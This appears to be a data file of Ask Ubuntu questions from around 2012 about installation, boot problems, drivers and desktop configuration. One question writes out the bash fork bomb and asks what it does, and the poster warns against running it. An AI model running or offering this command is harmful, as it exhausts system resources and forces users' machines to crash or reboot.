159459	gtk.textview lost default cut-copy-paste signal handlers in a quickly project . how can get back ?	i try to create a note taking app based on quickly . i have a gtk.textview what holds the note , and i need the default textview and edit behaviors what a gtk.textview has when i add from the code instead of in glade . i realized that the builder in quickly helpers connect all signals not assigned to a handler in glade to a default handler . this could come handy but in my case it is unwanted . how can i get back the default behavior of the textview without modifying the builder function ? i would like to keep the default handler functionality on other widgets . edit : in the meantime i realized that i lost only the default keybindig to those default actions , i mean e.g . ctrl+x for cut . the textview has a popupmenu and e.g . cutting from there still works . how i can set ctrl+x , ctrl+c , ctrl+v to work again ?
159460	installing 12.04 on a system already running ubuntu/windows 7 dual boot help	i 'm currently running ubuntu 12.04 ( 10gb ) and windows 7 ( 450gb ) in a dual boot configuration . i also have about 10gb of a partition for asus recovery , but i doubt i need it . i love ubuntu so much that i want to make it the only os on my hard drive . my question is , can i just use the livecd to install ubuntu and select the option in the installer to `` erase disk and install ubuntu '' and have the installer delete my current dual boot of ubuntu/windows7 and everything off my hard drive ? also , if im installing ubuntu as the only os , do i need to defrag my hard drive at all before i do this ? thanks for any help in advance !
159467	ubuntu 12.04 64x alert sounds dont work	when using ubuntu 12.04 i 've aquired the need to use the system alert sounds . i 've been trying to make my ssh shell play alert beeps ( `` \a '' ) back to me , but to no avail , i finally figured out that it 's not the ssh session itself , but the alert sounds altogether . i 've tried almost all the solutions out there , these have no result ubuntu tweaks echo -e `` \a '' turning up the volume in system settings - > sounds - > sound effects /usr/bin/canberra-gtk-play -- id= '' desktop-login '' -- description= '' gnome login '' beep changing the default alert sounds set to ubuntu copying files in /usr/share/sounds/ubuntu/stereo to /usr/share/sounds what i have noticed /usr/bin/canberra-gtk-play -- id= '' desktop-login '' -- description= '' gnome login '' returns `` option parsing failed : can not open display : '' echo $ display returns `` :0 '' going into system settings - > sounds - > sound effects and clicking on a sound makes it play , but when actually asking for the alert sound it wont play the sounds wont play in `` guest '' or other users either . i 'm using gnome-classic from package gnome-shell , but it also does not work in the default unity shell everything i have tried to get it to work returns no sounds whatsoever can anyone help me out with this one ? i 'm completely lost as to what else to try
159469	ubuntu does n't boot after installation	i just installed the latest version of ubuntu next to my windows 7 system . after i restarted my computer , it started windows 7 . i looked under computer if i can start ubuntu under windows 7 , but it does not show me the partition where i installed ubuntu with 3 partitions . i restarted again , went to boot menu , but was n't able to start ubuntu . what can i do ?
159475	can i use my phone as a live-usb and for tethering at the same time ?	i understand that you can have an ubuntu live cd/usb . i am able to use this ubuntu live cd/usb , connect my phone to the same computer via usb , switch on wireless + tethering and i end up with a ubuntu live cd/usb with internet connection . my question is , is it possible to add ubuntu live cd/usb into my phones sd card , plus the phone into a computer via usb , get the computer to boot the live cd/usb software directly from my phones sd card , where my phone acts as the ubuntu live usb , switch on wireless+tethering on my phone , and with the same usb connection on which the phone is passing the live usb to the pc , give the pc an internet connection too ? is this possible ? if that is not clear . what i am currently doing is that i have a usb stick and a phone , i.e . 2 items . the usb stick is to allow any pc to book up from the live image , and then i use my phone to give that booted up pc an internet connection . what i am asking is , is it possible to stick the usb live image into my phone , so i only need to carry around 1 item , my phone , which can provide the usb live image and the internet connection to any pc which can boot from a usb device ?
159482	grub unable to install . installation fail	while installing ubuntu 12.04 from http : //www.ubuntu.com/ mention site .after selecting packages i am facing grub installation fail and can not be boot .
159483	what happened to the ubuntu chromium project ?	what has happened to the ubuntu chromium project at https : //launchpad.net/chromium-project ? there are no builds for ubuntu 12.04 and the latest version available there is version 18 ( for all channels , even nightly ) . but the current stable version of chrome is version 20 and the latest available development version is version 22 . in the past this ppa provided a new chromium package shortly after google released a new chrome version . but now the stable channel is two versions behind and nightly is even four versions behind . is this project dead ? is there a replacement ppa ? or maybe some automatic build job is broken and nobody noticed it yet ?
159485	what are the default arguments for cluttergst ?	hello everyone i am trying to make a simple video player using gtk3 python & gstreamer . i am also using clutter , cluttergtk & cluttergst the problem arises when initialise the cluttergst like : cluttergst.init ( ) but i dont know the argument which should be passed here . if i try sys.argv my gtk window disappears .
159491	why did the command `` : ( ) { : | : & } ; : '' make my system lag so badly i had to reboot ?	danger ! do not run this command to 'test ' it unless you are prepared for a crash and/or force-rebooting your system . i was in my virtualbox running 12.04 trying to compile an app , and while waiting i happened to chance upon a forum where a comment said : try : ( ) { : | : & } ; : fun , too , and does n't need root . without thinking , i ran it in my gnome-terminal . it made my 12.04 ( in virtualbox ) lag so badly , i had to shut it down . my question is what does this command do ? : ( ) { : | : & } ; :
159492	installing 12.04 's boot loader on the partition boot record	i want to install ubuntu , without it touching my mbr . i plan to install ubuntu 12.04 on a particular ext3 partition and grub on the pbr of that partition . from this page : https : //help.ubuntu.com/community/windowsdualboot if you have a problem with changing the mbr code , you might prefer to just install the code for pointing to grub to the first sector of your ubuntu partition instead . if you do that during the ubuntu installation process , then ubuntu wo n't boot until you configure some other boot manager to point to ubuntu 's boot sector . so it tell me what i have to do . my question is how do i do this ? i am guessing i have to grab the alternate install disc choose manual partitioning it will ask me to install grub and i have to choose the partition instead of the mbr . edit boot.ini to add ubuntu . i am on xp . are these steps correct ? please tell , i am asking because i really do n't want to screw this up . also are there any other gotachas i should keep in mind ? like updating screwing up the mbr ? thanks edit : one question : in the alternate install cd , where exactly is the option to install grub in pbr ? edit2 : why does anything i am trying to do has a bug associated wit it .
159495	build failed on launchpad	i am still getting this error : /bin/sh : 1 : glib-compile-schemas : not found the full log : https : //launchpadlibrarian.net/109259873/buildlog_ubuntu-precise-i386.facebookupload_12.07.6_failedtobuild.txt.gz i already tried to add libglib2.0-bin on the dependencies but this fix did n't work . i tried to run quickly configure dependencies but this command is going to add it under `` depends : '' instead of `` build-depends : '' each time i run quickly submit the control file is going to be overwritten . does anyone found how to fix it ?
159505	how to switch windows manager on-the-fly ?	i know there 's a command to let compiz take over from whatever windows manager is running , using compiz -- replace & , same for unity with unity -- replace & . what are the similar commands for other window managers ( e.g . kde4 's plasma , gnome , lxde , xfce ) ? and will this take all running application windows along ?
159513	ubuntu software centre is not there	hello i wonder if you can help me . my ubuntu software centre is just not there . even when i type software centre into the into the dash search , nothing comes up please help . i am using ubuntu 11.10 . thank you
159515	how can i add a notebook background in glade ?	i want to add a background image to my pages in my notebook . how i can do this ?
159519	how can i customize fonts and backgrounds for gnome-terminal ?	mac has background-color -theme adjusting . during summer , i realize why it would be so super-cool : it is hard to see anything with standard settings when there are so much sun-light . so how can i adjust the background-color settings and font similarly to mac console ?
159520	ca n't install software by terminal	i do n't know what packages i have installed that i no longer can get and install packages in terminal . e.g . when trying to install prozgui , i got this error : traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 60 , in < module > sp = softwareproperties ( ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/softwareproperties.py '' , line 90 , in __init__ self.reload_sourceslist ( ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/softwareproperties.py '' , line 538 , in reload_sourceslist self.distro.get_sources ( self.sourceslist ) file `` /usr/lib/python2.7/dist-packages/aptsources/distro.py '' , line 91 , in get_sources raise nodistrotemplateexception ( `` error : could not find a `` aptsources.distro.nodistrotemplateexception : error : could not find a distribution template and it happens for all others too . plus , my software center has been disabled and does n't start . i get this error for that too : traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 111 , in < module > from softwarecenter.app import softwarecenterapp file `` /usr/share/software-center/softwarecenter/app.py '' , line 40 , in < module > from softwarecenter.db.application import application , debfileapplication file `` /usr/share/software-center/softwarecenter/db/application.py '' , line 30 , in < module > from softwarecenter.distro import get_distro file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 151 , in < module > distro_instance=_get_distro ( ) file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 140 , in _get_distro module = __import__ ( distro_id , globals ( ) , locals ( ) , [ ] , -1 ) importerror : no module named optimos can anyone please help me with this ? thank you in advance !
159524	how do i get the wubi installer to use a pre-downloaded iso ?	i have this iso file ubuntu-10.04-desktop-i386.iso and then i downloaded the corresponding wubi installer for this version . place them inside the same directory in windows , but instead of making use of the iso file it ignores it and goes ahead with downloading another one . what am i supposed to do ? did i download the wrong version of iso file ?
159526	how to get hibernation working on sony vaio x with ubuntu 10.04 ?	i am trying hard to get hibernation mode working on a sony vaio x laptop . i already tried what this guy is advising , but it was n't helping : http : //westhoffswelt.de/blog/0041_sony_vaio_x_ubuntu_installation_experience.html maybe someone else had the same problem and could solve it somehow ? cheers , luki
159527	application does not start after installing . running `` quickly run '' works perfectly	i 've made my application for ubuntu app showdown . when i start it from terminal using quickly run it works well . i 've packaged it with quickly package and installed locally . unfortunately it does not start . i think it 's a problem with linking to css file inside my python code , but i do n't know how should i link properly , so it will work after install . output from terminal when starting installed app : michal @ michal-inspiron-530-11 : ~ $ easy-stopwatch /usr/lib/python2.7/dist-packages/gi/overrides/gtk.py:391 : warning : g_object_set_property : construct property `` type '' for object `window ' ca n't be set after construction gtk.window.__init__ ( self , type=type , **kwds ) ( easy-stopwatch:10446 ) : gtk-critical ** : gtk_css_section_get_file : assertion `section ! = null ' failed ( easy-stopwatch:10446 ) : gtk-critical ** : gtk_css_section_get_end_position : assertion `section ! = null ' failed ( easy-stopwatch:10446 ) : gtk-critical ** : gtk_css_section_get_end_line : assertion `section ! = null ' failed traceback ( most recent call last ) : file `` /usr/bin/easy-stopwatch '' , line 33 , in < module > easy_stopwatch.main ( ) file `` /usr/lib/python2.7/dist-packages/easy_stopwatch/__init__.py '' , line 33 , in main window = easystopwatchwindow.easystopwatchwindow ( ) file `` /usr/lib/python2.7/dist-packages/easy_stopwatch_lib/window.py '' , line 35 , in __new__ new_object.finish_initializing ( builder ) file `` /usr/lib/python2.7/dist-packages/easy_stopwatch/easystopwatchwindow.py '' , line 56 , in finish_initializing css_provider.load_from_path ( 'data/ui/gtk-style.css ' ) file `` /usr/lib/python2.7/dist-packages/gi/types.py '' , line 43 , in function return info.invoke ( *args , **kwargs ) gi._glib.gerror : < unknown > :1:0 : failed to import : error opening file : no such file or directory michal @ michal-inspiron-530-11 : ~ $ part of my python code : # styling via css file screen = gdk.screen.get_default ( ) css_provider = gtk.cssprovider ( ) css_provider.load_from_path ( 'data/ui/gtk-style.css ' ) style_context = gtk.stylecontext ( ) style_context.add_provider_for_screen ( screen , css_provider , gtk.style_provider_priority_user ) -- -- -- -- -- -- -edit -- -- -- -- -- -- -- -- after some searching i realized that quickly package does not make app to install in /opt but quickly package -- extras does . after installing in /opt i 've edited my python file so the link to css file looks like this : css_provider.load_from_path ( '/opt/extras.ubuntu.com/easy-stopwatch/share/easy-stopwatch/ui/gtk-style.css ' ) after that my app works . i 'm not sure if i can do that in the code i 'd like to submit to ubuntu app showdown .
159531	any chance for fully working x1600 pci-e id 71c3/unity under ubuntu 12.04 ?	how can i get unity working under an ati radeon x1600 pci-e on ubuntu 12.04 ? i 'm rather windows guy , but i can do some things with cli . ati seems to have ended support for this card for both windows and linux . theres no proper driver in jockey ; binary driver from software center does n't give unity , just unity 2d . yes , i 've tried the commands from this post - without any positive results ; should i try installing drivers manually ?
159539	bluetooth in ubuntu 11.04	how can i use bluetooth in ubuntu 11.04 ? when i opened bluetooth preferences , i get a message like '' no bluetooth adapters present '' and also it gives me your computer does not have any bluetooth adapters plugged in if i click `` receive files '' option , i get `` personal file sharing preferences '' dialog box . in that i get the following ... this feature can not be enabled because the required packages are not installed on your system also i have `` share files over the network '' option locked . can anyone suggest a way to get the required packages ?
159544	remove windows 8 boot	installed ubuntu over a windows 8 trial . after installation , windows 8 still tries to boot . wiped disk clean with acronis and reinstall ubuntu . windows 8 still tries to start , but goes to blank screen . ubuntu never tries to boot . naturally live mode works fine . what do you think of wiping disk again , install windows 7 and try using grub approach or do you know how to remove windows from the cleaned disk ?
159554	ubuntu 12.04 wo n't load - hangs at busybox v1.18.5 / initramfs	i want to start by saying that i am very new with linux ( about 1 month using it ) . i have had no problems up until now . i am running ubuntu 12.04 from a toshiba laptop with 250 gb hard drive and 3 gb of ram . everything worked fine yesterday . the only changes i made was was that i downloaded banshee to try as a replacement for rhythmbox and did a few recommended updates . this morning i tried to boot and it took a long time and i finally got this error : mount : mounting /dev/disk/by-uuid/02bc41cc-1e21-4700-a179-be2805a658c4 on /root failed : invalid argument mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have requested /sbin/init . no init found . try passing init= bootarg . busybox v1.18 . ( ubuntu 1:1.18.5-1ubuntu4 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands ( initramfs ) i 'm not sure what to do beyond this point . i have read around on here and have n't found the help i need . i did try to boot it from the live cd . i can boot up to the try ubuntu/install ubuntu screen . when i go through the try ubuntu selection i ca n't access my hard disk . when i clicked on it i got this error : unable to mount 247 gb filesystem error mounting : mount : wrong fs type , bad option , bad superblock on /dev/sda/1 , missing codepage or helper program , or other error . in some cases useful info is found in syslog - try dmesg|tail or so . i tried dmesg|tail and saw a string of values but nothing that looked helpful . i have also tried to boot from the grub screen as recovery mode and previous linux version but they did n't work either . i tried to load windows recovery environment ( loader ) ( on /dev/sdc3 ) and got this message : error : no such device : 268057b1805785e9 error : hd1 can not get c/h/s values i had saw somewhere that i could fix this with the live cd but my knowledge is n't good enough to try . i tried something with gpart that i had read , but the system told me that i did n't have gpart . could someone please explain to me what i need to do and/or have n't tried yet .
159557	no way to show seconds in gnome classic clock	i can not force clock in gnome classic to show seconds . tried within dconf-editor , changing all available clock settings : com > canonical > indicatior > datetime there i was trying by changing custom-time-format and setting time-format to custom and by checking show-seconds . both does not work . org > gnome > desktop > interface i turned clock-show-seconds on . nothing happened . org > gnome > gnome-panel > shell > clock show-seconds enabled , no reaction . also , i 've been restarting system after each change . please , help - i need it for few things . i 'm using ubuntu 12.04
159558	change the `` device name '' in the details window of system settings	i would like to change my `` device name '' as shown in the settings panel . how do i do this ?
159560	animate spinner with thread pygtk	i am trying to animate a spinner while the programm is running but i ca n't . i tried using threads but i ca n't get what i want ... you can look here for the progress i made http : //www.reddit.com/r/ubuntuappshowdown/comments/vvyav/problem_with_spinner/ i get the spinner to animate but the program stops running ...
159561	ubuntu keeps reconfiguring my network	i 'm configuring a `` network '' , between two computers ( both with ubuntu 12.04 ) , using a crossover cable and assigning all ips by hand . when i set up an interface , with ip netmask etc , everything works , but in less than a minute ubuntu remove all my configuration and shows a message saying `` activation of network connection failed '' . my guess is that it is trying to get the ips via dhcp , but i 'm not using anything of that . anyone knows some way to disable that automatic configuration ?
159562	how could chinese users pay for an app in software center ?	i am a chinese user , and i want to buy the game braid , but i do n't have paypal , any cheap and safe way to solve this ?
159564	how to flush the empathy stored passwords ?	i recently changed my google talk password , which causes empathy to prompt for the new one . when i enter it , everything works fine . however , after a reboot ( or desktop environment reset ) it will prompt again . it does n't remember it . how can i make it ? i 'm using empathy 3.4.2.1 on ubuntu 12.04 , but was already experiencing this issue on 11.04 .
159566	how do i do drag-and-drop with an appindicator ?	is it possible to connect the appindicator icon to receive a basic drop-event ? like with every other gtk+ widget drag_dest_set ( ... ) ?
159567	no wireless network recognized on a dell vostro 3560	i just installed ubuntu 12.04 along with windows 7 on the same laptop - dell vostro 3560 . now , on windows 7 i can access to different wi-fi networks . however , when i am logging onto the ubuntu section ( after re-starting my laptop ) - an error message appears : disconnected - you are now offline when i take a look at my network menu ( in the upper bar on the screen ) , i see that no network is found ( and i have a few of them in the area . ) . i tried to look around but really could not find a concrete practical solution to this specific problem , would appreciate any solution from anyone out there that had this problem and solved it . developer @ ubuntu : ~ $ sudo lspci -nn 00:00.0 host bridge [ 0600 ] : intel corporation ivy bridge dram controller [ 8086:0154 ] ( rev 09 ) 00:01.0 pci bridge [ 0604 ] : intel corporation ivy bridge pci express root port [ 8086:0151 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation ivy bridge graphics controller [ 8086:0166 ] ( rev 09 ) 00:14.0 usb controller [ 0c03 ] : intel corporation panther point usb xhci host controller [ 8086:1e31 ] ( rev 04 ) 00:16.0 communication controller [ 0780 ] : intel corporation panther point mei controller # 1 [ 8086:1e3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation panther point usb enhanced host controller # 2 [ 8086:1e2d ] ( rev 04 ) 00:1b.0 audio device [ 0403 ] : intel corporation panther point high definition audio controller [ 8086:1e20 ] ( rev 04 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation panther point pci express root port 1 [ 8086:1e10 ] ( rev c4 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation panther point pci express root port 2 [ 8086:1e12 ] ( rev c4 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation panther point pci express root port 3 [ 8086:1e14 ] ( rev c4 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation panther point usb enhanced host controller # 1 [ 8086:1e26 ] ( rev 04 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation panther point lpc controller [ 8086:1e57 ] ( rev 04 ) 00:1f.2 sata controller [ 0106 ] : intel corporation panther point 6 port sata controller [ ahci mode ] [ 8086:1e03 ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation panther point smbus controller [ 8086:1e22 ] ( rev 04 ) 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati thames xt/gl [ radeon hd 7600m series ] [ 1002:6840 ] 07:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 07 ) 08:00.0 network controller [ 0280 ] : broadcom corporation device [ 14e4:4365 ] ( rev 01 ) web-e 's suggestion of searching for additional drivers did n't show anything @ web-e , you suggested that i do the following : 1.check for additional drivers - did not show any relevant result 2. run the lspci -vvv command in the terminal . the relevant result ( communication - ethernet , etc . : 07:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 07 ) subsystem : dell device 056e control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 43 region 0 : i/o ports at 3000 [ size=256 ] region 2 : memory at c3404000 ( 64-bit , prefetchable ) [ size=4k ] region 4 : memory at c3400000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8169 kernel modules : r8169 08:00.0 network controller : broadcom corporation device 4365 ( rev 01 ) subsystem : dell device 0016 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 11 region 0 : memory at c3500000 ( 64-bit , non-prefetchable ) [ size=32k ] capabilities : < access denied > thank you web-e for still commentating , i 'll appreciate you further response : - )
159571	system resets to login screen spontaneously	now i 'm experiencing spontaneous resets of the desktop environment ( when logged in and working normally ) , where the screen will go black , then reset to the login screen . the resets appear to be random , though there is a chance it occurs more when using nautilus . the screen goes black instantly , e.g . there is nothing like a disappearing launcher or window borders . where can i begin finding the cause ? info : i 've recently upgraded from 11.04 to 11.10 , then 12.04 . using nvidia drivers `` current '' ( 295.40-0ubuntu1 )
159572	how to determine file in `` error opening file for reading '' error	since ubuntu 12.04 , whenever i open aterm , i get the following error message : error opening file for reading : permission denied aterm still opens and runs correctly , but i get that error message . i 'd like to figure out what all this is about . is someone familiar with this specific error for aterm ? otherwise , is there some log that records files that are attempting to be opened so i can determine what file it 's complaining about ? i 've grepped my log files for `` aterm '' without success . other tips for determining what the issue is ?
159573	i dont know my password and wont let me change it via grub	i recently turned off the login password so i would not have to enter my password every time i turn the system on . but now when i try to update or download anything it asks me for my password so i enter my old password and it keeps telling me its wrong when i have only ever had the 1 password and its a simple 1 so i would not forget and considering i have only had ubuntu installed for two days it is really frustrating . i have also tried resetting it via the grub but it wont let me type the new password . please help asap .
159575	how do i make java default to a manually installed jre/jdk ?	i have ubuntu 12.04 amd64 installed on my machine , on the previous versions of ubuntu it was deadly easy , now there is this command update-java-alternatives with a really bad man page . i just have my jdk unpacked on a mounted partition like /media/mydisk/jdk , how i can force the use of that jdk instead of the one that comes in the ubuntu repository ? what is the logic behind this update-java-alternatives ?
159582	issue in moving windows from one desktop to another with the compiz cube	after having installed compiz i made a reset then i have enabled : composite gnome compatibility opengl negative desktop cube expo rotating cube viewport switcher 3d windows cube reflection and deformation fading windows window decoration mouse position polling regex matching move window -resize window then the usual commands alt+tab+shift+left/right and alt+tab are not working anymore . any solution ? thank you !
159584	evolution sending email settings	can receive comcast mail with evolution but can not send . the smtp settings record more digits when clicking the server configuration apply key . sending ( smtp @ comcast.net : tenz222 ) port587 after clicking apply , receive a `` error while sending message '' host lookup failed etc when rechecking , the sever settings are , ( smpt @ comcast.net % 253atenz222 ) attempted this process many times with same result . now need to be proactive and ask for help . will phone for help anywhere , anytime in usa . thanks
159586	how to install radeon open source driver ?	i have an msi radeon hd 7850 card . msi provide no linux support , and the amd driver gives me an unsupported hardware watermark that does not show up in screenshots . i uninstalled the proprietary driver and found that unity 3d no longer works , and i really only picked ubuntu because of the excellent shortcuts provided in the recent versions . trying to locate the open source driver has been a pain for me . according to the documentation i have read it is pre-included in ubuntu 12.04 , yet there is no unity 3d support . i tried using the newest drivers from amd 's website , but that also had the watermark . does anyone know how i can get the open source driver ? if not , does anyone know how to remove the watermark . i 'm on the verge of going back to windows .
159588	how can i make my primary partition larger ?	well i 'm running 2 different distro 's of linux right now and i decided to make my ubuntu partition my primary partition larger so i took 119.53 gb out of my other distro 's partition and it became unallocated and then i figured gparted would when i right click on it to resize/move give me the option of using it to make another partition bigger but it did not so i went google searching on line and in one post i saw it said you had to format the unallocated space so i formatted it to ext4 the same as my primary partition but still no options to add it to any thing what do i do ? *update : i have included a picture my ubuntu primary partition is highlighted which is the one i want to make larger the partition labeled extra is what i want to use to enlarge my primary partition .
159589	why is my workspace switcher view skewed	i have been using workspace switcher in ubuntu just fine but recently have encountered this problem . the windows in the switcher do n't fill the screen . i must have pressed some combination of buttons somehow but ca n't find any information anywhere in regards to resizing them . as you can see in the screen shot it looks like a perspective view or something . i should also add i have a dual monitor setup and nvidia graphics . the switcher still works but the fact the screens do n't fit my actual screens is driving me nuts . thanks in advance for any help .
159601	how do i format my entire hdd ?	ok i have recently made some mistakes with installing some operating systems that i should have just kept on a live cd not ubuntu but another os and with my ocd when i saw my lot 's of different partitions i just wanted to reset my computer so it boot 's up and does n't load any os and i have to put in my ubuntu live cd and install that and that would be my only os on this computer so i want to know how i can just wipe my entire hard drive so when it boot 's i get to put my live cd in and start anew ?
159604	how to directly connect 2 ubuntu pcs via wi-fi ?	i want to create a direct link between 2 pcs via wi-fi without using a router to avoid a bottleneck . what should i do ? both pcs uses ubuntu 12.04 amd64 .
159605	two of my partitions disappeared . i can t access these partitions from nautilus	however gparted detects them . the filesystems were ext4 and ntfs ( old windows partition ) . they used to be mounted at /media/part1 for the ext4 and /media/ntfs . last night after reading through the man pages for mount and fs , i put together this solution : create the missing directories in the /media directory and then type : sudo mount /dev/sda1 ext4 ... etc . is this the way to fix the problem ?
159609	error while running jetty server on port 80 as non root user	all , i was trying to setup jetty on port 80 but its giving exception saying permission denied as below . i have setup jetty to work with setuid and configured start.ini as follows : options=server , jsp , jmx , resources , websocket , ext , plus , annotations , jta , jdbc , setuid ( below as first configuration file in start.ini ) etc/jetty-setuid.xml and jetty-setuid.xml file with username and group name of non root user . 2012-07-03 15:29:02.411 : info : oejdp.scanningappprovider : deployment monitor /opt/jetty-hightide-8.1.3.v20120416/contexts at interval 1 2012-07-03 15:29:02.454 : warn : oejuc.abstractlifecycle : failed selectchannelconnector @ 0.0.0.0:80 : java.net.socketexception : permission denied java.net.socketexception : permission denied at sun.nio.ch.net.bind ( native method ) at sun.nio.ch.serversocketchannelimpl.bind ( serversocketchannelimpl.java:126 ) at sun.nio.ch.serversocketadaptor.bind ( serversocketadaptor.java:59 ) at org.eclipse.jetty.server.nio.selectchannelconnector.open ( selectchannelconnector.java:182 ) at org.eclipse.jetty.server.abstractconnector.dostart ( abstractconnector.java:311 ) at org.eclipse.jetty.server.nio.selectchannelconnector.dostart ( selectchannelconnector.java:260 ) at org.eclipse.jetty.util.component.abstractlifecycle.start ( abstractlifecycle.java:59 ) at org.eclipse.jetty.server.server.dostart ( server.java:273 ) at org.eclipse.jetty.util.component.abstractlifecycle.start ( abstractlifecycle.java:59 ) at org.eclipse.jetty.xml.xmlconfiguration $ 1.run ( xmlconfiguration.java:1215 ) at java.security.accesscontroller.doprivileged ( native method ) at org.eclipse.jetty.xml.xmlconfiguration.main ( xmlconfiguration.java:1138 ) 2012-07-03 15:29:02.455 : warn : oejuc.abstractlifecycle : failed org.eclipse.jetty.server.server @ 66da9ea4 : java.net.socketexception : permission denied java.net.socketexception : permission denied
159612	how do i open .jar files without using terminal in manually installed java ?	how do i open .jar files without using terminal in manually installed java ? . i tried open with dialog but java is not there .so how do i manually create it ? edit i want some thing like this
159613	where does 'clear ' command come from ?	i 'm from windows background . i wish to know where do all commands like exit , clear comes from in my terminal ? and are they scripts ? in what language they have been written ?
159617	how to install ubuntu on a zeroed-out drive ?	very new at all of this ... do n't understand most of the answers i 've read to other questions ( i.e . partitions , iso images , etc . ) but i zeroed-out my hard drive on a computer that ran xp and would like to download ubuntu . can anyone explain how to do that in 'layman 's ' terms ?
159620	how to center date time in top panel ?	i 'm running 12.04 with gnome . if needed , i can switch to unity to do the fix . i 've got 2 desktops running 12.04 . one has the current date/time with the icons at the upper right ( default ) . the other has date/time in the center of the top panel ( i made this happen ) . i want both computers to have the date/time at the center . how did i do that ? i know that i changed something to move the date/time on one computer . but i do n't remember what i did . i tried several different searches but did not find an answer .
159621	strange noise every few seconds	if i turn the volume off on my laptop and an application attempts to play audio ( say i get a facebook chat ) , my speakers will sometimes play a little `` click '' noise that 's hard to describe . starting a few days ago , a sound that i believe is the same as that one keeps intermittently playing every 3 seconds or so whether the volume is off or on . as it 's very annoying , i 'd like to get rid of it . anyone have any ideas ? i realize this is a vague description but this is sort of difficult to describe .
159622	how is the wine project financed ?	wine is a fantastic project and in my opinion it 's speed of development is extremely fast . this must cost quite some resources , which i doubt is all done by volunteers . this makes me wonder : who are the major stakeholers in wine , and who bears the brunt of the financial backing ?
159628	what is ubuntu soyuz ?	when i was building an application in launchpad , i found that in karma , there is ubuntu soyuz . it found that it also increase my karma , can any one tell me what is meaning of ubuntu soyuz ?
159630	how do i make google chrome open incognito by default in 12.04 ?	in previous ubuntus ( gnome , not unity ) i could add `` -- incognito '' to the end of the executable file command of chrome to make incognito default . i can not find an executable file for chrome in 12.04 . how do i make incognito default for chrome in 12.04 ?
159634	what is this 'install release ' icon on my unity dock ?	upon a fresh install of ubuntu 12.04 , there 's this icon on the unity dock called `` install release . '' what is this and what is it supposed to install ? do i need this or can i remove it ? thanks
159635	why does n't gnome 3.4.1 installed from ppa on 12.04 load ?	i 've just installed gnome 3.4.1 on my ubuntu 12.04 , but when i log on to it , as gnome , the only thing showning is the background image . no icons , bottom panel , or launcher . nothing at all . i 've read that it 's necessary to start with gnome , rather than gnome classic , to install shell extensions such as the frippery applications menu . i hope that i can make myself understood , english is not my first language and i 'm new at this .
159643	no anti-aliasing with xmonad	i 'm looking into xmonad . one problem i 'm having is that most of my applications in xmonad do n't have anti-aliasing . for example gnome-terminal & evolution . i have this in my .xresources : xft.dpi : 96 xft.lcdfilter : lcddefault xft.antialias : true xft.autohint : true xft.hinting : true xft.hintstyle : hintfull xft.hintstyle : slight xft.rgba : rgb and this in my .gtkrc-2.0 : gtk-theme-name= '' ambiance '' gtk-icon-theme-name= '' ubuntu-mono-dark '' gtk-font-name= '' sans 10 '' gtk-cursor-theme-name= '' dmz-white '' gtk-cursor-theme-size=0 gtk-toolbar-style=gtk_toolbar_both gtk-toolbar-icon-size=gtk_icon_size_large_toolbar gtk-button-images=1 gtk-menu-images=1 gtk-enable-event-sounds=1 gtk-enable-input-feedback-sounds=1 gtk-xft-antialias=1 gtk-xft-hinting=1 gtk-xft-hintstyle= '' hintfull '' gtk-xft-rgba= '' rgb '' include `` /home/leon/.gtkrc-2.0.mine '' but i still have no anti-aliasing . when i launch gnome-settings-daemon i do get anti-aliasing . but i do n't want to run gnome-settings-daemon . what could be the problem ? i 'm running ubuntu 12.04 desktop .
159645	dual boot installation of ubuntu 12.04 lts on hp ultrabook envy-4 1002tx	i have purchased a hp ultrabook envy-4 1002tx with 500gb hdd +32gb ssd . it came preinstalled with windows 7 . i tried installing ubuntu 12.04 through a usb stick . it boots up ok , but during installation it could not detect the 500gb disk . before starting the installation i shrunk the partion and made an empty partition using windows disk management . please help .
159646	recover a folder through ubuntu one	i had a folder ( a backup of my wii homebrew actually ) synced with ubuntu one . unfortunately , i ran out of space on my hard drive , so i disabled ubuntu one sync for a while and deleted the folder off the hard drive . months later , i have space again and would like the folder back . i can see it though firefox , but i see no way to download it except by downloading individual files myself through firefox , and in this case the dense folder trees are almost as important as the files themselves . is there a way to tell ubuntu one to re-download the folder to my precise install ? or do i have to wait until they implement this feature in the web ui ? ( no , it 's not in my trash , and it was too long ago to use extundelete . )
159653	how to move flash video window to the primary display ?	how can i move my flashplayer video ( fullscreen ) to my primary monitor ? i 'm using kubuntu 12.04 and two displays . did n't find anything with google . if you need more info let me know .
159654	what 's the unity equivalent of gnome 's alt-f2 ?	how do you run any command in unity , similar to `` run command '' ( alt-f2 ) from gnome ?
